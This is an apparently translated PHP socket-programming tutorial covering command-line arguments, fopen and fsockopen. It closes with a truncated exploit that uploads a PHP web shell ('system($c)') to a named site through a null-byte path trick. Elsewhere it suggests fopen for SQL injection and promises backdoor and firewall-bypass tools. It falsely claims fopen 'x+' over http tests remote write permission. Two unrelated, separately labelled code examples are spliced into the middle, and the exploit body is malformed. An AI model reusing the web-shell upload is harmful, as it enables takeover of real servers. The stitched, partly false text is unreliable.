Preliminary PHP socket programming
Author: darkness [bst]
MSN: cqxy [at] 21cn.net
After a month of learning PHP I have gained a lot, but unlike most people I prefer sockets, and there are very few articles about sockets in PHP. So I decided to write a series of PHP socket reading notes, running from the most basic functions up to raw sockets (socket_raw).
Each installment combines examples with experience. The examples will include port forwarding (getting through a firewall), a dynamic-network-type exploit, port scanning, a PHP backdoor, and a packet-sending exploit framework. Since this is for study, I can only write one article per week. This is volume 1. I hope everyone will join in PHP shell programming.
Preface:
PHP is one of the most popular scripting languages in the world and is widely used in web programming. What I want to show is that PHP is not only excellent for the web but also excellent for shell scripting; people are simply more used to writing shell scripts in Perl. I should say that I am not a PHP master: I have only been in contact with PHP for a few weeks, and this is just a reading note. If there is any error, please report it. You can also mail me to discuss PHP.
Prerequisites:
The most attractive part of PHP to me is the sockets extension. I could just as well write an ordinary Winsock program in VB, but I chose PHP because it is cross-platform.
By default PHP does not support advanced sockets; it only supports the wrapped functions such as fsockopen. Sockets are a PHP extension and must be enabled. On Windows, open php.ini, search for the Windows extensions section, and remove the semicolon in front of extension=php_sockets.dll. That is all. On *nix, --enable-sockets must be added when compiling. If you do not load the extension with the dl() function, php_sockets.dll must be in the same directory as your PHP binary. The socket configuration of PHP is now complete.
The following are running problems:
Running a PHP script from the terminal is easy. On Windows: c:\php\php.exe -q test.php. On *nix the PHP interpreter must be declared at the top of the file, just as with Perl, for example #!/usr/local/bin/php -q, and then you run ./test.php. The -q parameter means that the PHP (HTTP) header information is not output.
Input parameter problems:
Some people ask how to pass parameters to a PHP shell script. On the web you pass parameters like this:
http://xxx.com/aa.php?param1=xxxx&param2=ssssss
PHP has parameter handling similar to Perl. Here is the official description:
$argv
An array of arguments passed to the script. When the script is run on the command line this gives C-style access to the command line parameters. When called via the GET method it contains the query string.
$argc
Contains the number of command line parameters passed to the script (if run in command line mode).
Simply put, here is an example.
The following code is used:
<?php
// Usage check: the script name counts as $argv[0], so three real arguments give $argc == 4.
if ($argc != 4 || in_array($argv[1], array('--help', '-h', '?'))) {
    echo "by darkness [bst]. we will come back soon!\n";
    echo "----------------------------------------------\n";
    echo "c:/php/php.exe -q uploadexp.php http://www.bugkidz.org/upload.php filepath\n";
    echo "--------------------------------------------------\n";
    exit;
}
$host = $argv[1];
$url  = $argv[2];
$path = $argv[3];
?>
I think you have understood it now: $argv[0] is the program itself. You can also do this:
printf("%s", $argv[1]);
I spent one hour at noon in an Internet cafe writing this short section.
The preceding section described how to run PHP from the command line. For more information, see
Http://www.php.net/manual/zh/features.commandline.php
1. fopen application
fopen can also be considered a wrapped socket function. It is not only for file reading and writing but also for sockets. fopen is equivalent to the Inet control/class in other high-level languages; compared with fsockopen, fopen is more advanced for URL operations.
How to use fopen:
$s = fopen($url, $mode);
Fopen mode attribute:
Mode  Description
r     Open for reading only; place the file pointer at the beginning of the file.
r+    Open for reading and writing; place the file pointer at the beginning of the file.
w     Open for writing only; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.
w+    Open for reading and writing; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.
a     Open for writing only; place the file pointer at the end of the file. If the file does not exist, attempt to create it.
a+    Open for reading and writing; place the file pointer at the end of the file. If the file does not exist, attempt to create it.
x     Create and open for writing only; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails, returns false and generates an E_WARNING-level error. If the file does not exist, attempt to create it. This is equivalent to specifying O_EXCL|O_CREAT for the underlying open(2) system call. This option is supported by PHP 4.3.2 and later and only works for local files.
x+    Create and open for reading and writing; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails, returns false and generates an E_WARNING-level error. If the file does not exist, attempt to create it. This is equivalent to specifying O_EXCL|O_CREAT for the underlying open(2) system call. This option is supported by PHP 4.3.2 and later and only works for local files.
That is, the same call works for local files and for the Internet. Cool, isn't it?
If you want to test whether the IIS directory of a site has write permission, write it like this:
$s = fopen("http://www.bugkidz.org", "x+") or die("No write permission");
If it succeeds you can go on to construct the following statements and use fwrite to write a remote file. In general, though, websites have read-only permission.
$s = fopen("http://www.bugkidz.org/index.php?id=1", "r");
This reads http://www.bugkidz.org/index.php?id=1 and obtains the complete file content, like this:
while (!feof($s)) {
    echo fgets($s, 1024);
}
I think fopen is the most convenient for SQL injection.
function phpinet($url)
{
    // Open the URL through the stream wrapper; die() if the open fails.
    $s = fopen($url, "r") or die("open url error");
    // Accumulate every line; a plain assignment would keep only the last one.
    $cache = "";
    while (!feof($s)) {
        $cache .= fgets($s, 1024);
    }
    // Close before returning; a statement after return would never run.
    fclose($s);
    return $cache;
}
This function is equivalent to Inet.OpenURL in VB.
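The following is an added example, not code from the original article: a stricter version of the phpinet() idea above for fetching a URL with fopen and the http:// wrapper. Because the mode table above says x and x+ work only on local files, and PHP's http:// wrapper supports reading only, the example sticks to mode "r" and adds what a reusable fetcher needs: a scheme allowlist so that file://, ftp:// and php:// cannot be opened through it, a timeout carried in a stream context, and a cap on the number of bytes read. The function name fetch_url(), the limits and the User-Agent string are my own choices; it assumes allow_url_fopen is enabled.

```php
<?php
// Added example (not from the original article). Assumptions: PHP with
// allow_url_fopen=On; the URL, byte cap and timeout are caller-supplied.
function fetch_url($url, $max_bytes = 1048576, $timeout = 10)
{
    // Only plain HTTP(S) URLs are accepted, so local files and other
    // wrappers cannot be read by passing a crafted "URL" to this function.
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return array('error' => 'only http:// and https:// URLs are allowed');
    }

    // The stream context carries the timeout and request options; without it
    // fopen() waits for default_socket_timeout (60 s) and follows redirects.
    $ctx = stream_context_create(array(
        'http' => array(
            'method'          => 'GET',
            'timeout'         => $timeout,
            'follow_location' => 0,      // do not chase redirects silently
            'ignore_errors'   => true,   // still return the body on 4xx/5xx
            'header'          => "User-Agent: php-fetch-example\r\n",
        ),
    ));

    $s = @fopen($url, 'r', false, $ctx);
    if ($s === false) {
        return array('error' => 'open url error');
    }

    // Read at most $max_bytes so an endless or huge response cannot exhaust
    // memory; fread() returns '' at end of file or when the timeout hits.
    stream_set_timeout($s, $timeout);
    $body = '';
    while (!feof($s) && strlen($body) < $max_bytes) {
        $chunk = fread($s, min(8192, $max_bytes - strlen($body)));
        if ($chunk === false || $chunk === '') {
            break;
        }
        $body .= $chunk;
    }
    $meta = stream_get_meta_data($s);
    fclose($s);

    // The http wrapper fills $http_response_header in this scope after the open.
    $headers = isset($http_response_header) ? $http_response_header : array();
    return array(
        'status'    => isset($headers[0]) ? $headers[0] : '',
        'headers'   => $headers,
        'body'      => $body,
        'truncated' => strlen($body) >= $max_bytes,
        'timed_out' => !empty($meta['timed_out']),
    );
}

// Usage from the command line: php -q fetch.php http://www.example.com/
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $r = fetch_url($argv[1], 65536);
    if (isset($r['error'])) {
        fwrite(STDERR, $r['error'] . "\n");
        exit(1);
    }
    echo $r['status'], "\n", strlen($r['body']), " bytes read",
         $r['truncated'] ? " (truncated)" : "", "\n";
}
```

The return value is an array rather than a bare string so the caller can see the status line and whether the read was cut short by the byte cap or the timeout, instead of silently treating a partial body as the whole page.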
Use of fsockopen functions
fsockopen is also a wrapped socket function, similar to the Winsock control in VB. Unfortunately it only supports active (client) socket connections and does not support bind and listen; to implement those you must use the advanced socket functions of PHP. Even so, fsockopen meets most requirements.
fsockopen is used like this:
resource fsockopen(string $target, int $port [, int &$errno [, string &$errstr [, float $timeout]]])
Example:
$sock = fsockopen("192.168.0.1", 80, $errno, $errstr, 30);
The first two arguments are the address and port, the middle two are the variables that receive the error number and message, and the last sets the timeout.
Usually it is written simply as $sock = fsockopen("192.168.0.1", 80);
$sock = fsockopen("192.168.0.1", 80); is a typical TCP connection. For a UDP connection:
$sock = fsockopen("udp://192.168.0.1", 53);
You can also use this to write a TFTP client.
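As an added example that is not part of the original article, here is a small DNS A-record lookup using exactly the udp:// form of fsockopen() shown above, driven from the command line with the $argc/$argv usage check described in the input-parameter section earlier. The function names, the default resolver 127.0.0.1 and the 3-second timeout are assumptions of mine; the packet layout follows RFC 1035. It shows the part the page leaves out: with UDP there is no connection to tell you whether a reply is genuine, so the client checks the transaction id, the QR bit, the RCODE and every length field before trusting the answer.

```php
<?php
// Added example (not from the original article): DNS A lookup over
// fsockopen("udp://..."). Assumptions: resolver 127.0.0.1 unless a second
// argument is given; only type A answers are decoded (RFC 1035 layout).

// Build a query for $name; $id is the 16-bit transaction id the reply must echo.
function dns_build_query($name, $id)
{
    $qname = '';
    foreach (explode('.', rtrim($name, '.')) as $label) {
        if ($label === '' || strlen($label) > 63) {
            return false;                                   // malformed hostname
        }
        $qname .= chr(strlen($label)) . $label;
    }
    // header: id, flags (RD=1), qdcount=1, an/ns/ar=0; question: qname, type A, class IN
    return pack('nnnnnn', $id, 0x0100, 1, 0, 0, 0) . $qname . "\0" . pack('nn', 1, 1);
}

// Step over a possibly compressed name at $pos; return the offset after it.
function dns_skip_name($pkt, $pos)
{
    for ($n = strlen($pkt); $pos < $n; $pos += $len + 1) {
        $len = ord($pkt[$pos]);
        if (($len & 0xC0) === 0xC0 || $len === 0) {
            return $pos + (($len & 0xC0) === 0xC0 ? 2 : 1); // pointer or root label ends the name
        }
    }
    return false;                                           // ran off the end: malformed
}

// Validate the reply (id, QR bit, RCODE, bounds) and collect the A records.
function dns_parse_reply($pkt, $expected_id)
{
    $h = strlen($pkt) >= 12 ? unpack('nid/nflags/nqd/nan', $pkt) : false;
    if ($h === false || $h['id'] !== $expected_id) {
        return array('error' => 'short packet or transaction id mismatch');
    }
    if (($h['flags'] & 0x8000) === 0 || ($h['flags'] & 0x000F) !== 0) {
        return array('error' => 'not a response, or rcode ' . ($h['flags'] & 0x000F));
    }
    $pos = 12;
    for ($i = 0; $i < $h['qd']; $i++) {                     // skip the echoed question(s)
        if (($pos = dns_skip_name($pkt, $pos)) === false) {
            return array('error' => 'bad question');
        }
        $pos += 4;                                          // qtype + qclass
    }
    $addrs = array();
    for ($i = 0; $i < $h['an']; $i++) {
        $pos = dns_skip_name($pkt, $pos);
        if ($pos === false || $pos + 10 > strlen($pkt)) {
            return array('error' => 'bad answer');
        }
        $rr = unpack('ntype/nclass/Nttl/nlen', substr($pkt, $pos, 10));
        $pos += 10;
        if ($pos + $rr['len'] > strlen($pkt)) {
            return array('error' => 'rdata exceeds packet'); // length field is peer-controlled
        }
        if ($rr['type'] === 1 && $rr['class'] === 1 && $rr['len'] === 4) {
            $addrs[] = inet_ntop(substr($pkt, $pos, 4));
        }
        $pos += $rr['len'];
    }
    return array('addrs' => $addrs);
}

// One query/reply exchange over a connected UDP stream.
function dns_lookup($name, $server = '127.0.0.1', $timeout = 3)
{
    $id = mt_rand(0, 0xFFFF);                               // random id: a forged reply must guess it
    $query = dns_build_query($name, $id);
    if ($query === false) {
        return array('error' => 'invalid hostname');
    }
    $sock = @fsockopen("udp://$server", 53, $errno, $errstr, $timeout);
    if (!$sock) {
        return array('error' => "$errstr ($errno)");
    }
    stream_set_timeout($sock, $timeout);                    // a lost datagram must not block forever
    fwrite($sock, $query);
    $reply = fread($sock, 512);                             // one datagram; classic DNS/UDP limit
    fclose($sock);
    if ($reply === false || $reply === '') {
        return array('error' => 'no reply within timeout');
    }
    return dns_parse_reply($reply, $id);
}

// Usage: php -q dnsq.php www.example.com [resolver-ip]
if (PHP_SAPI === 'cli') {
    if ($argc < 2 || in_array($argv[1], array('--help', '-h'), true)) {
        echo "usage: php -q {$argv[0]} <hostname> [resolver-ip]\n";
        exit(1);
    }
    $r = dns_lookup($argv[1], isset($argv[2]) ? $argv[2] : '127.0.0.1');
    echo isset($r['error']) ? "error: {$r['error']}\n" : implode("\n", $r['addrs']) . "\n";
}
```

A connected UDP stream only accepts datagrams from the address and port it was opened against, which is why this works for DNS (the server answers from port 53) and why a protocol whose server answers from a fresh port would need an unconnected socket instead.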
Fsockopen application example:
Instance 1: Simple HTTP session.
Code
The following code is used:
<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    // Each request line ends in CRLF; the blank line ends the request head.
    $out  = "GET / HTTP/1.1\r\n";
    $out .= "Host: www.example.com\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>
The process is generally like this:
1. Create the fsockopen resource.
2. Define the content to be sent.
3. Write the defined content with the fwrite or fputs function.
4. Read the reply one line at a time with fgets or fread until the end of file is reached.
5. Close the fsockopen resource with fclose.
ANGEL has written a PHP port scanning tool and posted it at
Http://www.4ngel.net/article/20.htm
Choosing fsockopen to write a simple exploit-sending framework is definitely a good idea, because it is so easy.
Look at my PHP upload vulnerability exploit.
Code
The following code is used:
<?php
# codz by darkness msn: cqxy [at] 21cn.net
$sock = fsockopen("www.riririri.com", 80);
if (!$sock) {
    echo "cannot connect it!";
}
$body = "-----------------------------7d41f4a600472"
      . "content-disposition: form-data; name=\"path\""
      . ""
      . "www.ppp%00"
      . "-----------------------------7d41f4a600472"
      . "content-disposition: form-data; name=\"image\"; filename=\"f:\\tools\\1.gif\""
      . "content-type: text/plain"
      . ""
      . "<?php"
      . "system($c);"
      . "?>"
      . "-----------------------